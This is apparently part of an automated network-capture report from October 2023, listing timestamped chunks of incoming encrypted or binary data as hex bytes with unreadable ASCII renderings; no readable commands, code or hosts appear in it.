                                      2023-10-26 07:03:21 UTC119INData Raw: 76 57 f1 cf 2e 5c 3e 3a d2 b6 0a d7 11 76 f8 1b ba fa bd e7 34 db 26 28 ca c3 1e 48 86 41 95 0e b0 15 3b 87 81 e5 dd 0f d5 fb cb 24 fe db d5 4b 6b b2 45 e9 67 89 60 50 87 ac e7 9b ab 69 17 92 6c 46 9e 75 c1 41 81 ea e3 77 bb 80 6b c2 59 1e a7 c9 c1 6e c5 f2 81 f5 57 d7 72 de e8 7c 8a 4e 4b 27 88 a9 bc f4 10 b5 82 ae 5d 2f 06 b9 a2 6f 8f 39 69 8d af 54 d6 41 a1 d0 0e 94 00 aa 76 f6 78 81 f7 70 4d 69 a8 c8 ce 43 4a 6e 41 2b 8b 8f 7d b8 9f de 63 c2 73 2b 8d 7d a1 bf f8 19 08 27 59 31 b8 6b 1d 38 66 64 db 53 bb 70 41 fe ec 32 ab 20 4d 5b 42 0b 17 9f 32 f6 d0 28 ef 7a 55 b8 cd 8a 14 a0 8b 62 6d fe 38 39 80 2f 44 41 43 27 a4 dc 0a 93 16 c4 54 b8 bd 23 74 d1 a2 0c 1b eb 99 1e 87 d2 1c c2 59 cf 06 41 89 82 8b bb 65 c2 30 f2 3c 32 df 79 d7 a8 7b de 1f bc 65 a4 c2
                                      Data Ascii: vW.\>:v4&(HA;$KkEg`PilFuAwkYnWr|NK']/o9iTAvxpMiCJnA+}cs+}'Y1k8fdSpA2 M[B2(zUbm89/DAC'T#tYAe0<2y{e
                                      2023-10-26 07:03:21 UTC120INData Raw: 4d 58 7b 3c 27 63 7f 18 8b 3c 48 77 f7 3b 48 56 97 49 4e e7 c1 79 d8 51 b3 a2 8c d5 b2 11 b9 57 03 2f 5d b4 56 26 7f 83 39 86 43 ff fc 3a 9f de b2 3d 9c 88 3b 3f 61 9d e6 89 8e a8 be 06 0e ee ab 68 5d 06 05 a6 08 53 d8 9b 62 09 58 fd 3d 11 8e be 51 45 b8 5f 3c 96 7a 44 1b e3 6e b4 a8 e1 56 0f c8 c6 ba 30 37 d2 68 44 d7 11
                                      Data Ascii: MX{<'c<Hw;HVINyQW/]V&9C:=;?ah]SbX=QE_<zDnV07hD
                                      2023-10-26 07:03:21 UTC120INData Raw: 0d ce 15 b4 fe 33 70 c6 db 27 08 c4 c5 1e 48 78 be a2 73 b0 15 c5 75 86 e5 fd 6a 1d fb cb de 01 ee e0 4b 95 be b8 e5 37 06 c9 5c 8e ae 31 3e a3 69 e3 60 6c 46 08 2e 0f 41 81 ee 77 22 d3 a3 18 41 58 1e ad 37 cd 29 9e ed 2e 7b 56 dd 50 3c 76 5c 9f b0 47 2f 76 87 b2 f4 10 4b 18 d3 da 0e 42 b3 8a e7 70 38 5a b7 26 55 d6 6b 5f dc 06 94 de a5 7a f6 58 52 9e 1f c3 97 a6 cc b3 8d b4 62 4b 0b 84 c8 7d b8 61 2e 6c fb 55 d5 81 73 5f 96 ce 19 7b a4 a6 30 8b e4 79 38 66 9a a1 d7 ba 0b 83 d6 69 37 55 26 76 b1 42 f8 eb bf 22 79 87 28 11 76 73 11 cd 74 12 50 82 42 2d 85 fb 39 7e 2a 83 47 47 27 d7 75 2b d2 1c 3a 58 41 b3 5e f3 d0 5c 0a 3d 63 b8 3e 8d 2c 10 34 58 d6 32 41 89 82 e3 c4 ea c3 ce f4 1d ba 20 75 d5 56 89 da 16 9c f2 84 ce 7f c2 22 2b 06 93 aa 9a 48 4e 1b a2 c1
                                      Data Ascii: 3p'HxsujK7\1>i`lF.Aw"AX7).{VP<v\G/vKBp8Z&Uk_zXRbK}a.lUs_{0y8fi7U&vB"y(vstPB-9~*GG'u+:XA^\=c>,4X2A uV"+HN
                                      2023-10-26 07:03:21 UTC121INData Raw: 3b b6 a6 91 47 4e 19 33 7d d6 71 92 e4 8c d5 4c ee 81 7c 4e 2f 5d 94 57 d0 80 7c 39 81 42 ff af bb 9e de b8 e3 9e 80 3b 3f ec 15 ef 89 a4 83 36 07 0e 1a 54 5d 43 06 25 a4 28 53 d8 c1 11 73 57 ff 37 19 02 bf 51 4f 6e d8 35 96 70 9a 15 eb 6e 94 89 76 57 0f 30 16 7d 28 3a d2 48 fd db 13 0d ce 17 bb fe 0d 2e ca d5 27 08 e0 c5 1e 48 78 b1 93 00 b0 eb c9 83 8f c5 f9 11 d5 fb 35 db c6 ec e1 4b 6b 8a 6f 1a 90 76 be 59 8e ac 19 69 ad 61 e9 9e 9b 4a 00 55 ec 4a 81 ea 89 d0 d6 9a 64 c2 59 1e 87 c9 c1 2e 9e b4 89 76 56 d7 78 4a 79 54 95 4e b5 2b 7e a7 92 f3 10 4b 8e 5e 5c 36 4c b9 a2 6f 49 95 50 9f af 74 de 61 a1 d0 f0 9a f6 a4 7a 08 54 cc f7 50 45 97 a6 c6 30 42 8d 75 4f 2b ab 36 71 ba 9f 00 63 fb 55 2b d5 83 51 b4 f9 39 72 a4 58 31 4c 45 71 38 66 9a a4 df ba 50 4e
                                      Data Ascii: ;GN3}qL|N/]W|9B;?6T]C%(SsW7QOn5pnvW0}(:H.'Hx5KkovYiaJUJdY.vVxJyTN+~K^\6LoIPtazTPE0BuO+6qcU+Q9rX1LEq8fPN
                                      2023-10-26 07:03:21 UTC123INData Raw: 6f fb c7 ac ea 62 78 4f 7a 86 30 f3 5a fd c5 fd 54 9b 95 da 76 05 5b ce 5e d2 0e 63 e3 ef 89 43 23 d4 62 7f 8e 9a 20 a5 fc cd a5 4b 05 ff 50 42 29 c3 c7 5d f5 a3 81 50 45 e9 4c 66 81 9e 79 aa 87 1e e8 10 30 11 95 a0 71 68 ab a6 20 46 6f f9 93 87 c8 9c 69 3c 03 1b fe e2 74 3d 69 4b f9 3b 48 a8 a1 db 41 e7 3f 55 94 51 93 e4 72 db a0 ef b8 90 42 3d 5d 94 86 2f 7f 83 39 8e 7b d9 8f b9 9e 20 b4 19 90 76 37 32 12 96 b1 89 84 82 4d cc 0e e4 51 44 58 06 25 a4 62 6d 71 cc 11 8d 79 d2 37 39 06 41 5f 5d 90 d6 c3 9a 62 64 39 c6 6e b4 80 88 56 36 f7 17 44 3e c4 de 4c 03 29 1d 07 30 94 ec fe 33 8c 34 dc 27 28 91 03 1e 48 82 41 97 04 b0 eb c9 81 8f 6a ab 11 d5 f9 b0 11 ff e2 e5 22 fa dc c6 2f 6f 89 9a 7c a8 ac 19 97 5d 67 fb 9e 65 b8 04 47 cc 61 82 ea 89 2e 29 a2 52 d0
                                      Data Ascii: obxOz0ZTv[^cC#b KPB)]PELfy0qh Foi<t=iK;HA?UQrB=]/9{ v72MQDX%bmqy79A_]bd9nV6D>L)034'(HAj"/o|]geGa.)R
                                      2023-10-26 07:03:21 UTC124INData Raw: b8 69 55 8e 1e 76 07 65 b7 88 67 e5 d1 9d f8 44 20 69 ee fa 16 62 47 fd 4b 5c 76 04 17 0c 94 57 26 37 8f 29 6d 32 d3 52 53 6a a7 75 64 18 9a aa e0 84 2a 6c 91 29 ca 61 c3 c9 d2 3f 4a 86 b2 1e 19 0a 64 85 98 6e c6 56 1b 95 94 6b e9 4a 1e ca 87 f8 32 37 4a 95 d5 7c 23 5c 19 e9 96 cd 3d 69 c1 f1 dc 6e 63 58 75 52 0e 31 0d 5e c7 4c fc aa 9d 79 d6 51 47 73 56 5f 2c 09 27 13 ef 89 47 fd c9 62 7f f5 a7 2e b7 f8 33 52 46 17 96 e1 5d 2c c3 c7 a3 b4 1d 9c 50 45 c9 f1 6a 82 9e a7 a5 95 1e e8 b6 c2 0d 96 80 41 28 ab a6 de b9 58 f0 93 87 36 6e 72 3c 23 a4 f2 e7 74 aa 40 ef f6 3b 4e 56 97 41 4e c7 2e 75 d6 51 6d ea 9e d5 b2 11 b4 7c 4e 0f 61 b4 a8 2f 81 82 fe aa 42 ff 8f 47 92 d5 b8 e3 9c 8c 3b c1 1e 14 e7 06 d2 80 36 05 75 2e 55 64 55 6f 7d 5a 06 58 d8 e1 2c 8d 59 fd
                                      Data Ascii: iUvegD ibGK\vW&7)m2RSjud*l)a?JdnVkJ27J|#\=incXuR1^LyQGsV_,'Gb.3RF],PEjA(X6nr<#t@;NVAN.uQm|Na/BG;6u.UdUo}ZX,Y
                                      2023-10-26 07:03:21 UTC125INData Raw: 1a a3 91 0b 3f 67 7c 19 c7 47 d0 e8 54 19 5b ea ba 1d 48 ca 49 34 b9 bc 9a 32 5c 76 14 e0 5c fe 66 86 2c 13 f1 65 7d f6 d9 91 83 17 78 0d ee ec e8 cc e5 34 dc fd ec 25 d5 87 18 a5 25 54 50 e3 02 01 5e 73 86 e0 9a 27 06 29 86 0e fe 11 f2 41 82 de fe d2 8a e5 27 43 33 c0 fd 4c 29 20 6a b8 69 58 a5 32 56 1a 65 49 84 9d e4 16 8b f2 44 af c1 e7 fa 14 62 42 fb 4b 8a e7 03 17 f4 66 5e 21 1f 37 36 6d 34 ae 67 5d 78 a3 55 85 14 88 aa 3e 80 38 6c 91 29 c7 4a d1 e9 fd 3f 6a 86 4c 1f 20 dd 6a 86 98 b0 c4 56 1b 6b 66 61 fb b4 12 39 8b 65 64 17 0c 97 ae b7 dd 5d 24 cf 08 cc 3d 57 c0 c4 df 6e 43 3f 45 52 0e cf fd 42 d5 4c 02 58 83 6b f6 7d 05 73 56 a1 d3 31 09 31 ef 89 67 02 c0 62 7f 03 32 2e b7 fe 33 55 43 17 df 7d 7d 29 c3 39 ad e6 9a 96 ae 49 fb b2 4a a2 9e 59 ab 79
                                      Data Ascii: ?g|GT[HI42\v\f,e}x4%%TP^s')A'C3L) jiX2VeIDbBKf^!76m4g]xU>8l)J?jL jVkfa9ed]$=WnC?ERBLXk}sV11gb2.3UC}})9IJYy
                                      2023-10-26 07:03:21 UTC126INData Raw: a3 e0 71 1e a0 f1 f2 34 0c 73 9f fa de d6 a3 41 14 e4 a2 93 3f ea 24 3f 42 a9 6a 32 2e 92 47 75 cf 74 24 bb 3d 3f 24 7b 1c ba 5e b5 f8 d3 4b 91 96 1e 41 9b 91 2c 4b ef 32 60 d2 cb 49 56 93 26 d8 54 be 79 b8 8c b4 41 70 9f ef bf 31 e6 a4 73 19 31 42 b3 c7 41 a3 16 86 32 b3 a4 7d c7 15 e4 f5 7d 05 35 99 50 23 c7 67 d2 16 5a 0b a5 eb 7d 40 5a ca 69 8f b0 bc 9a 32 54 4e 06 93 df ff 46 8c 0c 10 f1 9b 73 95 5d b0 c5 1d 50 85 11 e2 f0 e4 6c cb d0 e5 cc 07 ce 87 18 8d 4c 54 69 f9 71 82 5f 8d 81 c4 9b d9 0a 23 f5 aa fe 11 f8 69 51 f7 ed d8 a2 47 06 5f 39 3e f3 b2 27 12 69 b8 97 54 49 3c 64 07 65 b7 88 71 e5 0f d8 f2 44 af c1 ef c3 03 9c 4e fd b5 ae 6a 02 37 f3 98 50 26 47 e9 26 7d 34 8e d3 53 6a a3 ab 75 0a 9a aa e0 86 2a 6c b1 f1 c6 73 c3 17 fc 06 69 86 4c 1f de
                                      Data Ascii: q4sA?$?Bj2.Gut$=?${^KA,K2`IV&TyAp1s1BA2}}5P#gZ}@Zi2TNFs]PlLTiq_#iQG_9>'iTI<deqDNj7P&G&}4Sju*lsiL
                                      2023-10-26 07:03:21 UTC127INData Raw: 21 13 f3 aa ad e1 d1 09 db 44 f8 59 7b 61 a5 4d fb 65 3e bf f3 f9 52 86 58 be e9 f3 c9 05 fa 20 a5 0a 28 50 ac e2 85 b4 99 03 43 ca 8b f7 51 85 a8 cf c5 2c a8 f1 41 17 a2 c1 da 3d 2d 99 e9 50 13 29 5b 62 d6 91 43 7e 36 b5 46 c2 0d 55 3f 9b e0 02 42 18 f3 3c b0 22 e6 0f 0d 04 66 2d e0 a5 c8 e3 e1 ae f7 50 14 ce 7f 93 fa 00 d3 b1 41 14 e4 af b8 24 ca 31 3f bc a5 94 33 78 22 46 75 c9 07 68 bb 3d c0 d6 70 1e d3 56 24 f9 d3 4d 91 96 14 41 bb 79 20 47 ef ec 66 c0 cb 49 56 9e 0d cf 74 80 79 46 80 4a 40 26 22 ee bf 37 22 dc 7e 19 cf 6e b6 c7 7f d8 19 77 c1 93 9b 83 cb 19 1a db 66 05 35 67 a2 30 fe 50 d0 16 5a f5 57 ea 44 31 6a ca 69 71 d6 16 9b cc 5b 6f 0c e0 5c fe b8 88 20 13 f1 65 7f ea d9 91 cb 17 78 0d ee e3 c3 ed e5 ca d0 11 e5 04 ce 79 14 a4 db 75 68 ff 02
                                      Data Ascii: !DY{aMe>RX (PCQ,A=-P)[bC~6FU?B<"f-PA$1?3x"Fuh=pV$MAy GfIVtyFJ@&"7"~nwf5g0PZWD1jiq[o\ exyuh
                                      2023-10-26 07:03:21 UTC129INData Raw: 01 0a 54 b3 77 87 92 c9 4a bb 38 70 74 c3 be e6 45 45 0a 43 bc ba 59 23 74 7e 8c e1 b7 9d ec ce 8d 02 55 d8 46 7f 8e 25 d7 b8 55 6b 13 7e 66 66 2c d7 d6 9a 5d 4b 3a 1e 5d 75 41 7b 4c f0 86 01 16 86 88 a9 55 cd 58 3f e5 d5 9c 22 1f f6 92 0f 9e 43 67 93 62 9f de 3a 5c 31 32 2b fc 30 97 01 32 f3 aa ad b9 d1 0b d8 44 b7 f1 7a 61 a3 4d f9 6f 3e 31 64 d5 5f 86 78 b2 b0 9c 13 fb fb 13 c4 a1 29 50 92 18 84 45 67 23 76 e0 8a f7 af 75 a8 cf c5 bd 09 fc 41 31 db 70 db 3d d5 66 de 79 13 d7 57 96 da b1 45 80 3f b4 29 e6 65 ab 35 64 ec 28 40 e6 fa 3d e8 85 85 a2 0c 24 61 0d eb a5 90 72 70 0c fa 50 12 ce 7f 95 fa 4f 4d b0 41 1e e4 a7 80 3f 34 3d 3e 42 89 95 33 17 89 1f e4 42 cf 2d bb 3c 3f 26 7c 1c 2d 7a 29 f9 f3 4f 6f 98 18 19 45 8e 2d 4b 11 c0 6f c0 eb 48 a8 9f 34 80
                                      Data Ascii: TwJ8ptEECY#t~UF%Uk~ff,]K:]uA{LUX?"Cgb:\12+02DzaMo>1d_x)PEg#vuA1p=fyWE?)e5d(@=$arpPOMA?4=>B3B-<?&|-z)OoE-KoH4
                                      2023-10-26 07:03:21 UTC130INData Raw: 25 9c fe 26 cc 90 8a 10 7e fa 53 07 3c 75 1d 31 ef 03 fe fa eb 54 45 1b a0 99 db aa d5 2f aa 0a e9 87 e2 a9 c8 65 df ac c3 6b 82 f1 3b 66 12 6c 0f 9d b7 1c bf c0 65 d7 07 bf c3 86 a1 a1 8d 1a 32 4d 83 b9 c5 27 62 33 bf 48 39 45 82 4f 44 18 ba c0 c2 fe ca dd 5c 32 40 69 5e c8 ff 92 0e 58 53 8a a6 74 87 6c 3e 45 b5 c6 7c 8b cf 90 e4 65 5a 0a 1b 42 48 5a 1a 42 7e 8c e1 49 6f eb cd 73 26 7d d9 d7 8b 7e 2d d7 98 1a c6 12 7e 9e 07 b4 d6 d6 6e af 4b 3c 3e a8 79 41 7b dd 5c be 17 10 78 84 51 59 44 31 e1 e8 dd 9c b3 b8 97 4a 0f be 45 99 9f 60 61 bf 84 5d 31 ca d9 fe 31 b7 32 33 f3 aa 53 e0 16 15 d8 44 d8 7c 7b 61 a5 b3 0b 67 34 bf 2d e1 5e 86 78 4c e7 fd c9 fb 05 15 a5 0a 08 4d 94 40 7a b5 67 1a 5c ca 8b f7 8f 8b a4 cf c5 2c aa f1 41 17 b6 c1 da 3d 2d 96 de 73 13
                                      Data Ascii: %&~S<u1TE/ek;fle2M'b3H9EOD\2@i^XStl>E|eZBHZB~Ios&}~-~nK<>yA{\xQYD1JE`a]1123SD|{ag4-^xLM@zg\,A=-s
                                      2023-10-26 07:03:21 UTC131INData Raw: 89 70 61 39 0d 8e 2f 89 ad d5 d7 b7 ba 61 0d 3d bd a0 ad f9 d6 c6 2f 76 fd 88 d5 7b 75 43 3d ef 08 37 67 61 1c 53 a2 c5 8a c1 88 90 19 9e d2 b9 92 22 67 2a 43 0f fd eb a9 97 bb 30 a6 aa 66 5f 1f 33 b2 bf 65 0a e6 ac 5e 1d da 8a 52 70 e3 bc 1c c5 22 0e 53 2a 4a 7b 28 e0 f5 e4 e0 60 d3 3a bc de 25 cc 90 74 e0 79 c3 7d b6 3c 75 e3 38 11 0f d0 53 ca 56 43 e5 ae 61 da b3 f0 2f aa 0a e9 80 ec a9 e8 9b d3 a2 c3 24 7d f1 3b 6c cc 32 36 8f b7 5c 32 b3 46 d7 27 b6 3d 88 a0 5f a3 39 32 4d 7d 4b cd 29 42 30 41 44 37 bb a3 6c 5f 18 ba 3e 3d ce d8 dd 7c 33 33 4a 5e a7 24 6c 00 53 ad a4 bd 74 a7 68 c0 4b bb 38 72 73 c3 9e 1a 49 43 0a 3b 43 b6 5b 23 aa 7f b5 f0 b7 63 e0 33 84 2a 71 27 48 75 70 09 d5 b8 3a c6 ec 70 66 09 ba 28 da 96 a3 65 3c 1e a3 79 bf 7a 1a 57 87 01 10
                                      Data Ascii: pa9/a=/v{uC=7gaS"g*C0f_3e^Rp"S*J{(`:%ty}<u8SVCa/$};l26\2F'=_92M}K)B0AD7l_>=|33J^$lSthK8rsIC;C[#c3*q'Hup:pf(e<yzW
                                      2023-10-26 07:03:21 UTC132INData Raw: 3c 11 c4 d7 2d f7 8c 10 b9 c8 db 0c 91 00 4e aa cc 7b ab 92 96 a1 fb c4 7c 20 aa b6 28 33 1d 46 f3 88 07 bd 27 01 62 f8 e3 02 69 8c 1e d9 2a 65 2c 42 4d 3d 9b b4 79 6e a0 d8 11 3e 83 dd 03 3d f9 4f 3a 09 89 a1 47 79 99 f6 fc de 95 59 1b 37 be 40 c2 20 c7 2f 02 13 93 b5 14 c6 8a 01 87 77 78 9c 35 62 bd 0e 89 a7 2b db 4b b3 0f 92 14 a4 ab 71 2e e5 c1 2f 76 03 7a d9 7f 4c 4a c3 e3 0c c9 4b 6a 1c 3c 85 3b 8b f2 5b 6f 15 9e 2c 98 cc 23 1c c1 69 0f f9 15 a1 8b bb 4b 46 aa 60 5a cf 0b b3 ac 45 0a e6 ac 5c e3 7f 88 f1 14 fb ae 1c cf dc 07 48 1a b0 72 48 e1 89 07 62 60 d7 0b 9c de 25 cc b8 9e ee 7f e8 38 e5 3c 75 e7 c6 e3 02 d6 ad e6 56 43 bd 50 91 da 8a e9 35 ab 0a 17 77 e5 a8 c8 65 df a3 c3 12 58 ff 38 66 12 64 36 8f 49 15 bf b3 66 d6 07 b5 3d a0 1c a0 ad 39 4f
                                      Data Ascii: <-N{| (3F'bi*e,BM=yn>=O:GyY7@ /wx5b+Kq./vzLJKj<;[o,#iKF`ZE\HrHb`%8<uVCP5weX8fd6If=9O
                                      2023-10-26 07:03:21 UTC134INData Raw: e7 14 18 c6 64 c3 12 ec 76 bc 1b 71 0d c1 7b 7c d8 29 37 c5 3e 7f bd a9 5b e1 4d 92 46 48 40 13 2f 7a cf ee 9a af 08 3b ec 9e a7 95 14 d5 a7 c3 09 d0 be 5e 76 23 a5 a8 3f 71 c8 c3 67 8b 0c 82 0a 92 27 0d da c6 fe eb ac 1d fd 13 8b 52 c6 d4 9e 5c 5a 30 99 66 b2 ff 35 3f 75 0d 4a 1d 0f 2e 11 c4 d7 eb fe 8e 10 99 f0 8a f1 6e c1 57 a7 cd 7b 75 9e 97 a1 c4 08 8c db 55 48 da 3f 19 6c d3 99 37 b8 27 57 60 c1 f1 85 69 8c 2f f9 2a 65 2c bc bd 32 9e 94 42 15 a3 d8 ef 30 79 d1 06 c3 d5 4f 3a 29 8f 5f 46 40 78 f7 c5 f3 6b 50 1b c9 cc a4 c2 5b 22 d1 0e 17 6d d3 3d c7 f1 e9 79 79 7d 62 19 67 bd 2e 89 59 25 de b5 ba f0 9e 39 bd 8a 60 24 c5 c6 d1 77 3a 9f d7 7b 4c b4 31 ec 08 37 62 63 1c 47 63 c5 8a cf 6a c2 14 9e d2 b1 de 23 67 20 97 01 f8 eb a8 75 b7 35 a4 8a 6a 5e 31
                                      Data Ascii: dvq{|)7>[MFH@/z;^v#?qg'R\Z0f5?uJ.nW{uUH?l7'W`i/*e,2B0yO:)_F@xkP["m=yy}bg.Y%9`$w:{L17bcGcj#g u5j^1
                                      2023-10-26 07:03:21 UTC135INData Raw: 5c 00 84 77 99 38 87 d2 1c c2 56 f4 32 41 77 8e 77 b7 4d c3 ce fe 35 cc 20 4c c9 a8 85 d2 e8 b5 f3 84 e6 dc 55 51 a6 f9 9d a0 b2 e0 4d 1b a8 3f d9 b2 3c b0 58 e4 79 34 e2 ff 78 89 b8 14 ab d8 3f c0 7b 37 3e b4 69 87 fa f9 e0 4b f3 6b f5 a3 a4 45 34 7c f3 dc 6b 2c 6d 97 79 a7 1f e9 06 e8 2f 0a c6 9a cf 30 ec 56 ba 1b 8f 03 3e 7a 65 c6 29 37 c5 3e 7d b9 a9 7b 1d 41 97 46 96 44 13 2f 5a 30 ef a3 a1 99 a7 cc 67 ab 95 14 01 89 c8 09 d0 40 ac 7a 26 85 aa c1 7d cd 3d 46 b2 1f 82 0a 6c 58 90 d1 c6 f4 d2 93 3d fc 13 ab 51 38 da 9b a2 54 cc 95 63 4c d3 3d 3f 55 0d b4 1c 36 d5 10 fd dd d3 fb 8e 10 b9 c9 db 0c 91 c0 a7 a9 cc 7b 75 9b 94 a1 db 33 72 24 aa 48 d7 06 1c 46 d3 8a 3f b8 27 ff 63 f9 71 fc 96 73 c0 d5 2a 65 06 bc 50 0c 91 94 37 6d a0 d8 67 30 87 cc 23 c3 f5
                                      Data Ascii: \w8V2AwwM5 LUQM?<Xy4x?{7>iKkE4|k,my/0V>ze)7>}{AFD/Z0g@z&}=FlX=Q8TcL=?U6{u3r$HF?'cqs*eP7mg0#
                                      2023-10-26 07:03:21 UTC136INData Raw: a4 7a 08 56 c6 f7 70 b3 9b a4 c6 ee 42 b4 62 4f d5 aa f1 62 b8 9f 20 9c f2 55 2b 73 74 5e b6 87 ed 7b a4 5c 19 70 4a 79 3e 98 6a a8 d7 9a 72 4b d6 69 cd a5 28 77 b1 42 f8 ea bf 5a f5 d0 28 11 8a 5a 81 d0 74 18 ae 75 4e 2c fe 18 39 7e 2e 7d b5 4f 27 a4 d6 2e d2 16 c4 c5 da 93 29 74 d1 5c fe 1b e9 b9 3e 79 de 1e 3c 78 f2 32
                                      Data Ascii: zVpBbOb U+st^{\pJy>jrKi(wBZ(ZtuN,9~.}O'.)t\>y<x2
                                      2023-10-26 07:03:21 UTC136INData Raw: 41 89 7c 74 8e 70 c2 ce fe cb 3e 20 75 ff a9 85 d2 16 42 ff 84 ce 5f 51 51 ac 07 02 3c 92 c5 4f 1b a8 c1 29 be 3e b0 a6 16 77 36 c2 df 7f 89 b8 ea 54 e0 0c dd 7b 37 3e 6a 64 86 fa d9 1d 45 f1 6b 0b 51 a8 47 14 5c f4 dc 6b bd 0f b6 48 a2 1f e9 f8 de 28 0a c6 64 fb 88 12 89 43 e5 83 02 c0 5b 5c db 29 37 ed f4 70 b8 a3 71 1f 52 a7 43 68 df 12 2f 7a b8 ef a3 b0 28 3b ec 60 ab 6b 1a fc 87 f2 76 d1 be a0 78 d8 a9 ab c1 5d c5 c3 47 8b f2 83 33 78 26 34 d0 b4 c5 e9 ac 4d 8f b5 8a 52 32 a0 bb 55 5a ce 95 9d bc dc 3f 3f 8b 01 b7 1c 16 2c 11 c4 d7 2d fa b7 02 99 c8 db f2 9d 3f a9 92 89 7a 8b 97 b6 a9 fb 3a 72 da a4 b5 d6 3f e7 4a d0 8a 27 bf 27 ff 63 3f f0 3b 4a 8c 3e d9 d4 68 2c bc bd 35 9a 94 84 67 a2 d8 cf 30 87 dd 03 eb 17 4a 3a 2f 71 af 46 79 47 f4 c5 f3 95 a7
                                      Data Ascii: A|tp> uB_QQ<O)>w6T{7>jdEkQG\kH(dC[\)7pqRCh/z(;`kvx]G3x&4MR2UZ??,-?z:r?J''c?;J>h,5g0J:/qFyG
                                      2023-10-26 07:03:21 UTC137INData Raw: b4 62 4f 03 4f c9 7d be 61 2e 63 fb 75 2c 8d 7d 5f 48 f7 1a 7b a4 a6 3d b1 4b 59 39 66 64 a8 29 bb 49 59 d6 69 33 8b 2a 77 b1 bc 0a e6 bf 7a d6 d2 28 11 74 a5 b6 ce 74 18 50 87 41 2d de 30 39 7e 2e 83 4a 7a 33 a4 f6 2a a0 2d c6 54 36 c0 8b 75 d1 56 7a 35 e2 b9 3e 87 2c 12 3f 58 f6 cc 4d 8a 82 55 b2 6d c2 ce 00 34 0b 37 75 df a8 7b de 16 bc 7e c1 ce 7f 55 af a2 05 93 80 b4 c0 4f 1b 56 31 24 bc 3e 4e 54 19 75 16 e2 df 7f 89 46 15 6c d3 06 dd 7b 37 1e 4b 65 86 fa 27 ed 48 f3 6b f5 a3 a7 45 34 75 f3 dc 6b 43 f0 8e 74 a7 1f e9 c0 e3 2d 0a c6 5c bb cc 13 89 42 17 8d 03 ea 7b 4f eb 2c 37 8d c3 71 b8 25 5b 1f 50 b7 46 68 48 13 d1 74 38 ef 9b 91 0b 3b ec 60 55 99 1d ff a7 c3 09 d0 be 5e 79 1f bd a8 c1 7d 33 cf 41 8b f2 8e 0f 6c a8 5d ef a0 fe eb ac 1d f6 13 8b 52
                                      Data Ascii: bOO}a.cu,}_H{=KY9fd)IYi3*wz(ttPA-09~.Jz3*-T6uVz5>,?XMUm47u{~UOV1$>NTuFl{7Ke'HkE4ukCt-\B{O,7q%[PFhHt8;`U^y}3Al]R
                                      2023-10-26 07:03:21 UTC139INData Raw: db ef e2 e1 4b 6b f6 bb 90 d6 89 9d 5d 8e ac 18 8c 93 6d e9 5f 65 46 08 2b cc 41 90 ca 89 2e d7 a3 95 cc 58 1e 9f f8 c1 2e 9e 9e 57 76 57 d7 58 b4 77 5c 95 b0 4a 1e 7c a7 b2 f4 10 6b 8f a0 5d 0f bc b7 a3 6f 71 c6 5c 9e af 74 d7 61 a1 d0 f0 95 c7 a1 7a f6 58 fc f2 70 4d 97 9e 0c 31 bc 4b 9c 46 2b ab b3 9a b8 9f 24 42 fa 55 2b 8d 12 91 b6 f9 13 85 ad 58 31 c9 ac 79 38 62 9a a1 d5 ba 1f b9 d6 69 39 55 23 77 b1 c7 13 e8 bf 7e 08 d9 2b 11 1b af b8 cd 7e e6 a7 8b 42 56 19 38 39 7a 0e 7f 4b 43 27 cb 3b 2a d2 1c 3a 5d 46 b3 56 93 d1 5c 04 7a 1e b9 3e 8d 2c 15 3d 58 d6 32 41 89 82 8b be 6c c2 40 97 5a e2 21 75 d5 56 8b d2 16 61 f0 84 ce 7f 72 af b6 f9 9f a0 b2 ea 4f 1b a8 3e 37 bc 3e b0 58 5e 75 43 5b df 7c 88 b8 14 54 ca 36 df 7b 64 3e 4a 65 87 fa d9 f2 6b f3 6b
                                      Data Ascii: Kk]m_eF+A.X.WvWXw\J|k]oq\tazXpM1KF+$BU+X1y8bi9U#w~+~BV89zKC';*:]FV\z>,=X2Al@Z!uVarO>7>X^uC[|T6{d>Jekk
                                      2023-10-26 07:03:21 UTC140INData Raw: fb 8f b9 9e 86 46 13 91 88 13 d6 12 19 ed 77 8d 80 36 f9 02 e5 55 9a 5d 00 25 cb 86 53 d8 cb 37 73 55 fc 37 c7 0a b9 51 17 6e d8 3c 96 8e 6d 19 e3 90 b8 81 76 7f 3b cf 17 4e c0 34 d5 48 fd db 10 0d 10 1f ba fe 33 d6 34 db 26 28 c2 2c 1e 48 8c 41 92 00 b0 eb c9 8a 8f 1b f1 16 d5 94 45 da ff e8 c7 b5 67 b3 bb 1b 63 8e 9e 04 70 a2 18 97 5d 60 e9 9e 9b 4a 09 55 e4 75 80 ea 83 d0 d9 ab 6b 3c 55 1f a7 e9 c5 2e 9e 9e f1 84 58 d6 78 9c 9e 5c 95 44 b5 2e 76 a7 4c f8 11 4b 70 ac 55 0f 2d 37 a2 6f 7b c6 5e 96 af aa da 60 a1 2e 02 9c fe fc 84 f8 59 c4 09 79 4d 97 58 ca cf 43 9c 56 4e 2b a1 36 73 b2 9f de 6e fa 55 0b 89 7d 5f b6 a1 e7 75 a5 58 cf be 41 79 18 67 64 a8 d7 e3 50 4a d6 69 33 f3 a7 32 b1 bc f5 16 b1 71 f6 2e 21 11 74 a5 b4 cc 74 e6 a2 80 42 0d fe 38 39 7e
                                      Data Ascii: Fw6U]%S7sU7Qn<mv;N4H34&(,HAEgcp]`JUuk<U.Xx\D.vLKpU-7o{^`.YyMXCVN+6snU}_uXAygdPJi32q.!ttB89~
                                      2023-10-26 07:03:21 UTC141INData Raw: 77 4e 03 c0 9c 73 8e 64 06 83 fd cd 51 b9 19 f5 70 83 25 c3 c7 83 f0 9a 96 50 1d 17 bc 6a 82 60 50 ab 87 e0 e4 48 ce 37 a2 a1 51 22 8d 58 2c b8 61 cb 97 87 36 90 23 c2 2d 5a fe 1c 7d c3 68 8c fb 3b 48 80 ad 46 4e ed c1 7b dd 51 6d e8 8c d5 92 eb b8 6e 4e d1 51 bf a8 77 27 7d c9 8f 42 01 86 b9 9e 20 b4 1d 90 a0 0f 3e 12 13 19 87 88 80 c8 0b 0e e4 75 60 51 06 25 fc f6 5d d8 c1 ef 81 55 fd 17 38 06 bf 51 16 b0 d7 3d 96 70 3c 94 a6 6e b4 81 88 59 02 ce e9 4d 3e 3a 2c 44 03 d7 ef 01 3d 1b 9a fe 33 8e ca 2b 2b 24 ea ed 3a 49 86 b5 65 09 b1 15 3b 87 8c e5 92 ba d4 fb c1 e3 a4 e3 e1 4b 95 be b1 e5 4f 87 1e 5c 8e ec a2 97 a3 69 17 97 64 46 f6 59 cf 41 ee 54 89 2e dd cc 43 c2 59 14 8f 07 c0 2e 98 60 a7 74 56 29 74 ba 77 a2 99 